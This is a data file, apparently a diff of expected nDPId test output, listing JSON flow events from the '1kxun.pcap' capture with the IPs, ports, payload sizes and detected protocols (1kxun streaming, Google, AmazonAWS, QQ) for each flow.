+00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1654385142780,"flow_last_seen":1654385142861,"flow_idle_time":7580000,"flow_min_l4_payload_len":520,"flow_max_l4_payload_len":2836,"flow_tot_l4_payload_len":28083,"flow_avg_l4_payload_len":2160,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"142.250.186.34","src_port":38354,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Advertisement"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"finished","flow_packets_processed":57,"flow_first_seen":1654385145219,"flow_last_seen":1654385147933,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":21600,"flow_tot_l4_payload_len":248006,"flow_avg_l4_payload_len":4350,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49354,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} 
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1654385146263,"flow_last_seen":1654385158374,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":15840,"flow_tot_l4_payload_len":195184,"flow_avg_l4_payload_len":3753,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49370,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1654385146253,"flow_last_seen":1654385148239,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":18720,"flow_tot_l4_payload_len":144162,"flow_avg_l4_payload_len":4004,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49372,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} 
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1654385146276,"flow_last_seen":1654385147585,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":18720,"flow_tot_l4_payload_len":98936,"flow_avg_l4_payload_len":3091,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49380,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1654385146284,"flow_last_seen":1654385147935,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":21600,"flow_tot_l4_payload_len":133307,"flow_avg_l4_payload_len":4300,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49396,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} 
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1654385134408,"flow_last_seen":1654385136566,"flow_idle_time":7580000,"flow_min_l4_payload_len":225,"flow_max_l4_payload_len":499,"flow_tot_l4_payload_len":1447,"flow_avg_l4_payload_len":361,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.104.119.80","src_port":49242,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1654385146276,"flow_last_seen":1654385147926,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":21600,"flow_tot_l4_payload_len":128312,"flow_avg_l4_payload_len":4935,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49412,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184096,"flow_last_seen":1654385184096,"flow_idle_time":7580000,"flow_min_l4_payload_len":1132,"flow_max_l4_payload_len":1132,"flow_tot_l4_payload_len":1132,"flow_avg_l4_payload_len":1132,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.58","src_port":43266,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385184174,"flow_last_seen":1654385184282,"flow_idle_time":7580000,"flow_min_l4_payload_len":434,"flow_max_l4_payload_len":940,"flow_tot_l4_payload_len":1374,"flow_avg_l4_payload_len":687,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.58","src_port":43272,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385156962,"flow_last_seen":1654385157145,"flow_idle_time":7580000,"flow_min_l4_payload_len":682,"flow_max_l4_payload_len":1112,"flow_tot_l4_payload_len":1794,"flow_avg_l4_payload_len":897,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50140,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385156971,"flow_last_seen":1654385157153,"flow_idle_time":7580000,"flow_min_l4_payload_len":766,"flow_max_l4_payload_len":1114,"flow_tot_l4_payload_len":1880,"flow_avg_l4_payload_len":940,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50148,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385156978,"flow_last_seen":1654385157162,"flow_idle_time":7580000,"flow_min_l4_payload_len":508,"flow_max_l4_payload_len":1118,"flow_tot_l4_payload_len":1626,"flow_avg_l4_payload_len":813,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50164,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385156997,"flow_last_seen":1654385157178,"flow_idle_time":7580000,"flow_min_l4_payload_len":680,"flow_max_l4_payload_len":1113,"flow_tot_l4_payload_len":1793,"flow_avg_l4_payload_len":896,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50166,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} 
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1654385157001,"flow_last_seen":1654385157186,"flow_idle_time":7580000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3069,"flow_avg_l4_payload_len":1023,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50176,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1654385141046,"flow_last_seen":1654385141076,"flow_idle_time":7580000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":2351,"flow_avg_l4_payload_len":587,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.37","src_port":41390,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385235892,"flow_last_seen":1654385236487,"flow_idle_time":7580000,"flow_min_l4_payload_len":434,"flow_max_l4_payload_len":1229,"flow_tot_l4_payload_len":1663,"flow_avg_l4_payload_len":831,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.64","src_port":51686,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1654385143337,"flow_last_seen":1654385143386,"flow_idle_time":7580000,"flow_min_l4_payload_len":421,"flow_max_l4_payload_len":2836,"flow_tot_l4_payload_len":20884,"flow_avg_l4_payload_len":1898,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"142.250.186.174","src_port":36732,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Advertisement"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385232006,"flow_last_seen":1654385232057,"flow_idle_time":7580000,"flow_min_l4_payload_len":559,"flow_max_l4_payload_len":668,"flow_tot_l4_payload_len":1227,"flow_avg_l4_payload_len":613,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.217.16.142","src_port":53416,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}} 
-00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1654385229375,"flow_last_seen":1654385231942,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3139,"flow_avg_l4_payload_len":523,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"35.156.44.13","src_port":42554,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1654385229377,"flow_last_seen":1654385229406,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1728,"flow_avg_l4_payload_len":432,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"35.156.44.13","src_port":42566,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1654385232040,"flow_last_seen":1654385234239,"flow_idle_time":7580000,"flow_min_l4_payload_len":598,"flow_max_l4_payload_len":927,"flow_tot_l4_payload_len":3050,"flow_avg_l4_payload_len":762,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.122.190.70","src_port":33042,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
-00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385183491,"flow_last_seen":1654385183514,"flow_idle_time":7580000,"flow_min_l4_payload_len":394,"flow_max_l4_payload_len":810,"flow_tot_l4_payload_len":1204,"flow_avg_l4_payload_len":602,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.72.69.158","src_port":56094,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385183496,"flow_last_seen":1654385183520,"flow_idle_time":7580000,"flow_min_l4_payload_len":791,"flow_max_l4_payload_len":1640,"flow_tot_l4_payload_len":2431,"flow_avg_l4_payload_len":1215,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.72.69.158","src_port":56096,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385183495,"flow_last_seen":1654385183517,"flow_idle_time":7580000,"flow_min_l4_payload_len":394,"flow_max_l4_payload_len":797,"flow_tot_l4_payload_len":1191,"flow_avg_l4_payload_len":595,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.72.69.158","src_port":56098,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385183618,"flow_last_seen":1654385183642,"flow_idle_time":7580000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":830,"flow_tot_l4_payload_len":1485,"flow_avg_l4_payload_len":742,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.72.69.158","src_port":56104,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385127293,"flow_last_seen":1654385127488,"flow_idle_time":7580000,"flow_min_l4_payload_len":270,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":734,"flow_avg_l4_payload_len":367,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"129.226.107.77","src_port":41134,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}} 
-00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385119050,"flow_last_seen":1654385119358,"flow_idle_time":7580000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":538,"flow_tot_l4_payload_len":727,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.104.93.92","src_port":60962,"dst_port":1234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385119973,"flow_last_seen":1654385120216,"flow_idle_time":7580000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":538,"flow_tot_l4_payload_len":727,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.104.93.92","src_port":60972,"dst_port":1234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} 
-00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385120896,"flow_last_seen":1654385121164,"flow_idle_time":7580000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":538,"flow_tot_l4_payload_len":727,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.104.93.92","src_port":60984,"dst_port":1234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1654385232158,"flow_last_seen":1654385232180,"flow_idle_time":7580000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2540,"flow_avg_l4_payload_len":508,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"8.209.112.118","src_port":35426,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
-00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385229378,"flow_last_seen":1654385229413,"flow_idle_time":7580000,"flow_min_l4_payload_len":353,"flow_max_l4_payload_len":1249,"flow_tot_l4_payload_len":1602,"flow_avg_l4_payload_len":801,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.50","src_port":41940,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"finished","flow_packets_processed":106,"flow_first_seen":1654385131029,"flow_last_seen":1654385180912,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":21600,"flow_tot_l4_payload_len":635658,"flow_avg_l4_payload_len":5996,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":60148,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} 
-00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385181857,"flow_last_seen":1654385181897,"flow_idle_time":7580000,"flow_min_l4_payload_len":409,"flow_max_l4_payload_len":983,"flow_tot_l4_payload_len":1392,"flow_avg_l4_payload_len":696,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.117.221.10","src_port":59324,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1654385129508,"flow_last_seen":1654385129813,"flow_idle_time":7580000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":372,"flow_tot_l4_payload_len":627,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"119.45.78.184","src_port":38834,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"finished","flow_packets_processed":61,"flow_first_seen":1654385184927,"flow_last_seen":1654385185032,"flow_idle_time":7580000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":8568,"flow_tot_l4_payload_len":239007,"flow_avg_l4_payload_len":3918,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.66.2.90","src_port":35664,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1654385184928,"flow_last_seen":1654385184928,"flow_idle_time":7580000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.66.2.90","src_port":35666,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MpegDash.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1654385136207,"flow_last_seen":1654385137795,"flow_idle_time":7580000,"flow_min_l4_payload_len":208,"flow_max_l4_payload_len":21600,"flow_tot_l4_payload_len":179965,"flow_avg_l4_payload_len":5141,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":46170,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} 
-00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"finished","flow_packets_processed":82,"flow_first_seen":1654385136206,"flow_last_seen":1654385180918,"flow_idle_time":7580000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":23040,"flow_tot_l4_payload_len":523278,"flow_avg_l4_payload_len":6381,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":46184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385127244,"flow_last_seen":1654385127425,"flow_idle_time":7580000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":264,"flow_tot_l4_payload_len":421,"flow_avg_l4_payload_len":210,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":47230,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} 